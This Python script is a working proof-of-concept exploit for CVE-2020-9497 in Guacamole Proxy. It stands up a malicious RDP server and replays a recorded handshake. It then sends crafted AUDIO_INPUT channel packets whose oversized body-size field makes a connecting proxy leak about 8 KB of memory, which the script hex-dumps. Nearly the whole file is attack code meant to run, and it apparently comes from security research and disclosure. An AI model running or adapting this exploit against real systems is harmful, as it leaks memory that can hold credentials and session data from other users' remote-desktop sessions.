import socket
import struct
import sys
import ssl
import time
from elementals import Prompter, hexDump

##########################
## PoC Config Variables ##
##########################

VULN_ID        = "CVE-2020-9497 (CPR-ID 2143)"
PRODUCT_ID     = "Guacamole Proxy"
VULN_DESC      = "Missing input checks, leading to a massive Information Disclosure"

#################
## RDP Configs ##
#################

RDP_PORT         = 3389

CERT_FILE_NAME   = "selfsigned.crt"
KEY_FILE_NAME    = "private_no_pass.key"

#################
## RDP Configs ##
#################

CHANNELS_FLAG_FIRST = 1
CHANNELS_FLAG_LAST  = 2

def send_create_virtual_channel():
    payload  = struct.pack("<L", 0x0000000F)  # Total Length (must be accurate)
    payload += struct.pack("<L", CHANNELS_FLAG_FIRST | CHANNELS_FLAG_LAST)  # Flags
    # drdynvc
    payload += struct.pack("<B", (1 << 4) | 1)# Value - CREATE_REQUEST_PDU (1)
    payload += struct.pack("<H", 0x0200)      # Channel ID
    payload += b"AUDIO_INPUT\0"               # Channel Name
    # header flags
    packet  = struct.pack("!B", 0x00)         # Li
    packet += struct.pack("!B", 0xF0)         # Code - X224_TPDU_DATA (0xF0)
    packet += struct.pack("!B", 0x00)         # pad
    packet += struct.pack("!B", 26 << 2)      # Choice
    packet += struct.pack("!H", 0x0000)       # Initiator
    packet += struct.pack("!H", 0x03EF)       # Channel Id - drdynvc - 1007
    packet += struct.pack("!B", 0x00)         # byte
    packet += struct.pack("!B", len(payload)) # length
    # connect the payload
    packet += payload    
    # tpkt
    length = len(packet) + 4
    pre_packet = b'\x03\x00' + struct.pack("!H", length)
    # sum it up to the result
    return pre_packet + packet
    
def send_guacai_formats_Information_Disclosure():
    payload  = struct.pack("<L", 0x0000001E)  # Total Length (must be accurate)
    payload += struct.pack("<L", CHANNELS_FLAG_FIRST | CHANNELS_FLAG_LAST)  # Flags
    # drdynvc wrapper
    payload += struct.pack("<B", (3 << 4) | 1)# Value - DATA_PDA (3)
    payload += struct.pack("<H", 0x0200)      # Channel ID
    # guacai message
    payload += struct.pack("<B", 0x02)        # Message ID - SNDIN_FORMATS (2)
    payload += struct.pack("<L", 0x00000001)  # Num Formats
    payload += b'\x00' * 4                    # pad
    # sound format
    payload += struct.pack("<H", 0x0001)      # Tag - WAVE_FORMAT_PCM (1)
    payload += struct.pack("<H", 0x0001)      # Channels
    payload += struct.pack("<L", 0x00000001)  # Rate
    payload += struct.pack("<L", 0x00000001)  # Bytes Per Second
    payload += struct.pack("<H", 0x0001)      # Block Align
    payload += struct.pack("<H", 0x0008)      # Bpp
    payload += struct.pack("<H", 0x2000)      # Body Size - Info Leak size
    # header flags
    packet  = struct.pack("!B", 0x00)         # Li
    packet += struct.pack("!B", 0xF0)         # Code - X224_TPDU_DATA (0xF0)
    packet += struct.pack("!B", 0x00)         # pad
    packet += struct.pack("!B", 26 << 2)      # Choice
    packet += struct.pack("!H", 0x0000)       # Initiator
    packet += struct.pack("!H", 0x03EF)       # Channel Id - drdynvc - 1007
    packet += struct.pack("!B", 0x00)         # byte
    packet += struct.pack("!B", len(payload)) # length
    # connect the payload
    packet += payload    
    # tpkt
    length = len(packet) + 4
    pre_packet = b'\x03\x00' + struct.pack("!H", length)
    # sum it up to the result
    return pre_packet + packet
    
def parse_dump_line(line):
    return b''.join(map(lambda x: struct.pack("!B", int(x, 16)), line.split(': ')[-1].replace("  ", " ").split(" ")))
    
def rdp_init(conn):
    packet  = b'\x03\x00' + b'\x00\x6C'
    packet += parse_dump_line('0000: 02 f0 80 7f 66 62 0a 01 00 02 01 00 30 1a 02 01  22 02 01 03 02 01 00 02 01 01 02 01 00 02 01 01')
    packet += parse_dump_line('0020: 02 03 00 ff f8 02 01 02 04 3e 00 05 00 14 7c 00  01 2a 14 76 0a 01 01 00 01 c0 00 4d 63 44 6e 28')
    packet += parse_dump_line('0040: 01 0c 0c 00 04 00 08 00 01 00 00 00 03 0c 10 00  eb 03 04 00 ec 03 ed 03 ee 03 ef 03 02 0c 0c 00')
    packet += parse_dump_line('0060: 00 00 00 00 00 00 00 00')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0b'
    packet += parse_dump_line('0000: 02 f0 80 2e 00 00 07')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0f'
    packet += parse_dump_line('0000: 02 f0 80 3e 00 00 07 03 f0 03 f0')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0f'
    packet += parse_dump_line('0000: 02 f0 80 3e 00 00 07 03 eb 03 eb')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0f'
    packet += parse_dump_line('0000: 02 f0 80 3e 00 00 07 03 ec 03 ec')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0f'
    packet += parse_dump_line('0000: 02 f0 80 3e 00 00 07 03 ed 03 ed')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0f'
    packet += parse_dump_line('0000: 02 f0 80 3e 00 00 07 03 ee 03 ee')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x0f'
    packet += parse_dump_line('0000: 02 f0 80 3e 00 00 07 03 ef 03 ef')
    conn.send(packet)

    packet  = b'\x03\x00' + b'\x00\x22'    
    packet += parse_dump_line('0000: 02 f0 80 68 00 01 03 eb 70 14 80 00 00 00 ff 03  10 00 07 00 00 00 02 00 00 00 04 00 00 00')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x01\x9e'    
    packet += parse_dump_line('0000: 02 f0 80 68 00 01 03 eb 70 81 8f 8f 01 11 00 ea  03 ea 03 01 00 04 00 79 01 52 44 50 00 11 00 00')
    packet += parse_dump_line('0020: 00 09 00 08 00 ea 03 00 00 01 00 18 00 01 00 03  00 00 02 00 00 00 00 1d 04 00 00 00 00 00 00 01')
    packet += parse_dump_line('0040: 01 14 00 0c 00 02 00 00 00 40 06 00 00 16 00 28  00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00')
    packet += parse_dump_line('0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 0e 00 08 00 01 00 00 00 02 00 1c')
    packet += parse_dump_line('0080: 00 10 00 01 00 01 00 01 00 00 04 00 03 00 00 01  00 01 00 00 0e 01 00 00 00 03 00 58 00 00 00 00')
    packet += parse_dump_line('00a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 42 0f  00 01 00 14 00 00 00 01 00 00 00 aa 00 01 01 01')
    packet += parse_dump_line('00c0: 01 01 00 00 01 01 01 00 01 00 00 00 01 01 01 01  01 01 01 01 00 01 01 01 01 00 00 00 00 a1 06 02')
    packet += parse_dump_line('00e0: 00 40 42 0f 00 40 42 0f 00 01 00 00 00 00 00 00  00 0a 00 08 00 06 00 00 00 12 00 08 00 01 00 00')
    packet += parse_dump_line('0100: 00 08 00 0a 00 01 00 19 00 19 00 1b 00 06 00 01  00 0d 00 58 00 75 00 00 00 00 00 00 00 00 00 00')
    packet += parse_dump_line('0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00')
    packet += parse_dump_line('0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00')
    packet += parse_dump_line('0160: 00 00 00 00 00 00 00 00 00 17 00 08 00 03 00 00  00 18 00 0b 00 02 00 00 00 03 0c 00 19 00 06 00')
    packet += parse_dump_line('0180: 01 00 1a 00 08 00 af 94 00 00 1c 00 0c 00 02 00  00 00 00 00 00 00 00 00 00 00')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x24'    
    packet += parse_dump_line('0000: 02 f0 80 68 00 01 03 eb 70 16 16 00 17 00 ea 03  ea 03 01 00 00 02 16 00 1f 00 00 00 01 00 00 00')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x28'
    packet += parse_dump_line('0000: 02 f0 80 68 00 01 03 eb 70 1a 1a 00 17 00 ea 03  ea 03 01 00 00 02 1a 00 14 00 00 00 04 00 00 00')
    packet += parse_dump_line('0020: 00 00 00 00')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x28'
    packet += parse_dump_line('0000: 02 f0 80 68 00 01 03 eb 70 1a 1a 00 17 00 ea 03  ea 03 01 00 00 02 1a 00 14 00 00 00 02 00 ed 03')
    packet += parse_dump_line('0020: ea 03 00 00')
    conn.send(packet)
    
    packet  = b'\x03\x00' + b'\x00\x28'
    packet += parse_dump_line('0000: 02 f0 80 68 00 01 03 eb 70 1a 1a 00 17 00 ea 03  ea 03 01 00 00 02 1a 00 28 00 00 00 00 00 00 00')
    packet += parse_dump_line('0020: 03 00 04 00')    
    conn.send(packet)
    
    time.sleep(0.5)

def sendProtocolTLS(sock):
    """Declaring we only support TLS Authentication
    
    Args:
        sock (socket): socket with the connected client
    """
    protocol  = b'\x03\x00' + b'\x00\x13'
    protocol += b'\x0e\xd0\x00\x00\x12\x34\x00\x02\x01\x08\x00\x01\x00\x00\x00'
    sock.send(protocol)

def startPoC(local_ip, logger):
    """Contains the full logic for the presented PoC
    
    Args:
        local_ip (ip): ip address as a string
        logger (logger): elementals logger instance    
    """
    logger.info("Creating the malicious RDP server on IP: %s", local_ip)
    server_sock = socket.socket()
    server_sock.bind((local_ip, RDP_PORT))
    server_sock.listen(5)    
    logger.info("Waiting to attack a vulnerable RDP client that will connect to us")
    # Accepting a new client
    client_sock, client_addr = server_sock.accept()
    logger.info("Accepted a client from IP: %s", client_addr[0])
    # Starting the RDP protocol
    logger.info("Starting the attack")
    logger.addIndent()
    # We only support TLS
    logger.info("Preforming the handshake for security authentication (TLS)")
    rdp_neg = client_sock.recv(64)
    sendProtocolTLS(client_sock)
    # Add the TLS Layer
    ssl_sock = ssl.wrap_socket(client_sock,
                             server_side = True, 
                             certfile = CERT_FILE_NAME,
                             keyfile  = KEY_FILE_NAME,
                             ssl_version = ssl.PROTOCOL_TLSv1)
    # Receive some messages from the client
    ignored_data = ssl_sock.recv(1024)
    logger.info("Sending a recorded message to init the connection")
    rdp_init(ssl_sock)
    ignore_data = ssl_sock.recv(1024)
    # Send him our crafted message
    logger.info("Sending the PoC message to trigger the vulnerability")
    ssl_sock.send(send_create_virtual_channel())
    ssl_sock.send(send_guacai_formats_Information_Disclosure())
    logger.info("And the leaked bytes are:")
    logger.addIndent()
    recv_data = b''
    while len(recv_data) < 0x2000:
        recv_data += ssl_sock.recv(0x2100)
    logger.info(hexDump(recv_data))
    logger.removeIndent()
    logger.removeIndent()

def showDetails(logger):
    """Prints the basic details of the vulnerability we PoC
    
    Args:
        logger (logger): elementals logger instance    
    """
    logger.info("Starting the PoC Script for %s", VULN_ID)
    logger.addIndent()
    logger.info("Product: %s", PRODUCT_ID)
    logger.info("Vulnerability: %s", VULN_DESC)
    logger.removeIndent()
    
def printUsage(args):
    """Prints usage instructions for this file
    
    Args:
        args (list):  list of cmd line arguments
    """
    print('Usage: %s <local ip address>' % (args[0]))
    print('Exiting')
    exit(1)

##
# Main Function for the PoC Script
##
def main(args):
    # We should get only 1 argument
    if len(args) != 1 + 1:
        print('Wrong amount of arguments, got %d while exepected %d' % (len(args) - 1, 1))
        printUsage(args)
    
    # Parse the arguments
    local_ip = args[1]        
    # Create the prompter
    prompter = Prompter("%s PoC" % (PRODUCT_ID), [])
    # Show the PoC's meta-data
    showDetails(prompter)
    # Here we start    
    startPoC(local_ip, prompter)
    # Finished
    prompter.info("Finished Successfully")    

if __name__ == "__main__":
    main(sys.argv)